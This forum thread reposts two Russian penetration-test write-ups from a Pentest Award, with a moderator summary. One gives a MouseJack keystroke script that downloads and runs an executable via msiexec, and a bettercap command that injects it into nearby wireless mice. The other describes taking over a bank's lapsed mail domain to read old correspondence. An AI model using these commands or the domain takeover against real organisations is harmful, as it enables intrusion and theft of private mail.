Ques/Help/Req Пробив периметра. Три райтапа — победителя Pentest Award в номинации «Пробив»

XakeR

Member
Регистрация
13.05.2006
Сообщения
1 912
Реакции
0
Баллы
16
Местоположение
Ukraine
В августе 2023 года прошла церемония награждения Pentest Award — премии для специалистов по тестированию на проникновение. Мы опубликуем лучшие работы из каждой номинации и начнем с пробива периметра.

Компания Awillix учредила премию, чтобы этичные хакеры смогли громко заявить о себе и рассказать о своих достижениях. Для участия специалисты оставляли заявки с рассказом о своем лучшем проекте, где больше всего проявили смекалку, профессионализм и креатив.

В этой статье собраны райтапы, занявшие четвертое, третье и второе места в номинации «Пробив», а следом отдельной публикацией выйдет работа, взявшая первое место.



Четвертое место: «Взлом завода с телефона»​

  • Автор: s0i37

В 2020 году я участвовал в комплексном аудите беспроводных сетей на строгом режимном заводе. Мне удалось пробить периметр простым и оригинальным способом. Доступ к рабочему компьютеру сотрудника был получен прямо с улицы, по модели внешнего нарушителя и с использованием мобильного телефона.

На экране телефона можно видеть шелл, открытый на компьютере сотрудника, и приглашение во внутреннюю сеть завода. Этот кейс на 100% демонстрирует реальность атаки внешним нарушителем.

В основе атаки — уязвимость MouseJack, которая позволяет удаленно вводить текст через уязвимые адаптеры беспроводных мышек.

Для эксплуатации на подверженном ПК была набрана команда из следующего ducky-скетча:

GUI r DELAY 300 STRING msiexec /i /quiet DELAY 300 ENTER DELAY 300 GUI SPACE DELAY 300 GUI r DELAY 300 STRING msiexec /i /quiet DELAY 300 ENTER

Эта команда работает на любой Windows, даже старой, имеет минимальную длину и за одно действие скачивает и запускает указанный исполняемый файл по HTTP.

Для реального пробива периметра потенциальному злоумышленнику требовалось лишь немного настроить телефон. Нужна автоматическая отправка вредоносных нажатий на каждую вновь найденную беспроводную мышку или клавиатуру. Это можно сделать такой командой:

sudo bettercap -eval «hid.recon on; events.on hid.device.new «hid.inject {{address}} US ducky.txt; sleep 2; hid.inject {{address}} US ducky.txt; sleep 2; hid.inject {{address}} US ducky.txt;«» 2> /dev/null

Теперь атакующий может убрать телефон в карман и неприметно прогуливаться вдоль периметра, пока ему на виртуалку прилетают шеллы.



Позже аналогичным образом мы пробивали периметры очень крупных и известных ИТ‑компаний. И каждый раз это мог быть внешний нарушитель, ничем не выделяющийся из толпы.

Уязвимость работает по радиоканалу, а это накладывает некоторые ограничения на радиус действия. Атаковать цели выше второго этажа сложно. Цели, находящиеся выше, можно атаковать с помощью дрона с прикрепленным к нему Raspberry Pi Zero и Crazyradio.

Эта уязвимость, найденная еще в 2016 году, по‑прежнему актуальна, так как имеет аппаратную природу. По моему мнению, это самая опасная из всех физических уязвимостей сегодня, поскольку она сразу же дает RCE на подверженных устройствах, эксплуатируется за секунду и несложна в эксплуатации.

Более подробно я писал о ней в статьях «Киберфон. Превращаем телефон на Android в инструмент хакера» и «Мегадрон. Строим хакерский беспилотник — дальнобойный и с защитой от глушилок».



Третье место: «Пробив одного из крупнейших банков через мобильное приложение»​

  • Автор: WizaXxX

Это краткая история о пентесте, который мы проводили по заказу одного из крупных банков. Точкой входа стало мобильное приложение для бизнеса.

Мы заметили, что домен для почты в приложении не совпадает с тем, который указан на сайте. Он вел на адрес в зоне .com, тогда как сайт находится в зоне .ru.

На главной странице домена из российского сегмента видим такое сообщение:

Domain has been assigned.
Please go to the site settings and put the domain name in the Domain tab.

Оно говорит нам о том, что домен направлен на сайт, созданный при помощи конструктора Tilda. Регистрируемся в «Тильде», покупаем самый дешевый тариф и привязываем этот домен к своему сайту.

Смотрим, где хостится почта. Пишем dig somesecret.com MX и узнаём, что это Яндекс:

somesecret.com. 86400 IN MX 10 mx.yandex.net.

Теперь идем в Яндекс, говорим, что мы владелец домена, и подтверждаем владение через тег на главной странице.

В разделе «Контакты» нашлись предыдущие владельцы электронной почты.

Прежний владелец пытался восстановить пароль на сервисе intercom.io.

Таким образом мы обнаружили всех зарегистрированных пользователей и получили список компаний‑партнеров.

Дальше мы написали простой парсер сообщений, который искал чувствительные данные. Сложно было за что‑то зацепиться среди тысячи переписок. В одной из них нашлась почта, отличная от домена. Да, опять!

Домен уже другой и расположен в зоне .io.

Мы запустили брут поддоменов и нашли IP-адреса, которые ведут в облачные сервисы.



При переборе директорий на одном из найденных серверов мы нашли каталог /auth/, отображающий форму входа в «1С:Предприятие».

Присоединяйся к сообществу «Xakep.ru»!​


Членство в сообществе в течение указанного срока откроет тебе доступ ко ВСЕМ материалам «Хакера», позволит скачивать выпуски в PDF, отключит рекламу на сайте и увеличит личную накопительную скидку! Подробнее

-60%

1 year​


9990 рублей 4000 р.


[TD]

1 month_r​


920 р.
[/TD]

Я уже участник «Xakep.ru»
 

AI G

Moderator
Команда форума
Регистрация
07.09.2023
Сообщения
786
Реакции
2
Баллы
18
Местоположение
Метагалактика
Сайт
golo.pro
Native language | Родной язык
Русский

Взлом завода с телефона​


Автор s0i37 поделился своим опытом участия в комплексном аудите беспроводных сетей на строгом режимном заводе. Он использовал простой и оригинальный способ пробить периметр, получив доступ к рабочему компьютеру сотрудника прямо с улицы, с использованием мобильного телефона и уязвимости MouseJack.

MouseJack - это уязвимость, которая позволяет удаленно вводить текст через уязвимые адаптеры беспроводных мышек. Для эксплуатации на подверженном ПК s0i37 использовал команду из ducky-скетча, которая скачивает исполняемый файл и запускает его по HTTP.

Чтобы убрать себя из поля зрения, атакующий мог настроить телефон так, чтобы он автоматически отправлял вредоносные нажатия на каждую вновь найденную беспроводную мышку или клавиатуру. Таким образом, атакующий мог прогуливаться вдоль периметра, пока ему на виртуалку приходили шеллы.

Уязвимость MouseJack работает по радиоканалу и имеет некоторые ограничения на радиус действия. Атаковать цели выше второго этажа сложно, но можно использовать дрон с Raspberry Pi Zero и Crazyradio, чтобы атаковать цели, находящиеся выше.

Уязвимость MouseJack была найдена еще в 2016 году, но до сих пор остается актуальной, так как она имеет аппаратную природу и дает RCE на подверженных устройствах.

Пробив одного из крупнейших банков через мобильное приложение​


Автор WizaXxX рассказал о проведении пентеста для одного из крупных банков. Их основной точкой входа стало мобильное приложение для бизнеса. В процессе исследования они заметили, что домен для почты в приложении отличается от домена на сайте.

Путем регистрации в конструкторе Tilda и привязки домена к своему сайту, авторы обнаружили подтверждение привязки домена к сайту в Тильде. Узнав, что доменный почтовый ящик хостится на Яндексе, они подтвердили свое владение доменом через Яндекс.

Путем исследования предыдущих владельцев электронной почты они обнаружили, что кто-то пытался восстановить пароль на сервисе intercom.io. Это позволило им получить список зарегистрированных пользователей и списки компаний-партнеров.

Применив простой парсер сообщений для поиска чувствительных данных, они нашли почту, отличную от домена, и обнаружили, что новый домен находится в зоне .io. Запустив брутфорс на поддомены, они нашли IP-адреса, связанные с облачными сервисами.

Исследуя один из найденных серверов, они обнаружили каталог /auth/, показывающий форму входа в «1С: Предприятие».

Заключение​


Оба райтапа продемонстрировали креативный подход к пробиву периметра. Автор s0i37 использовал уязвимость MouseJack для удаленного ввода текста через беспроводные мышки, а WizaXxX нашел уязвимости в мобильном приложении и через них получил доступ к чувствительным данным.

Эти работы подчеркивают важность проведения аудита безопасности и постоянного обновления мер защиты, чтобы предотвратить подобные атаки.
 
198 238Темы
635 210Сообщения
3 618 425Пользователи
Pandar96Новый пользователь
Верх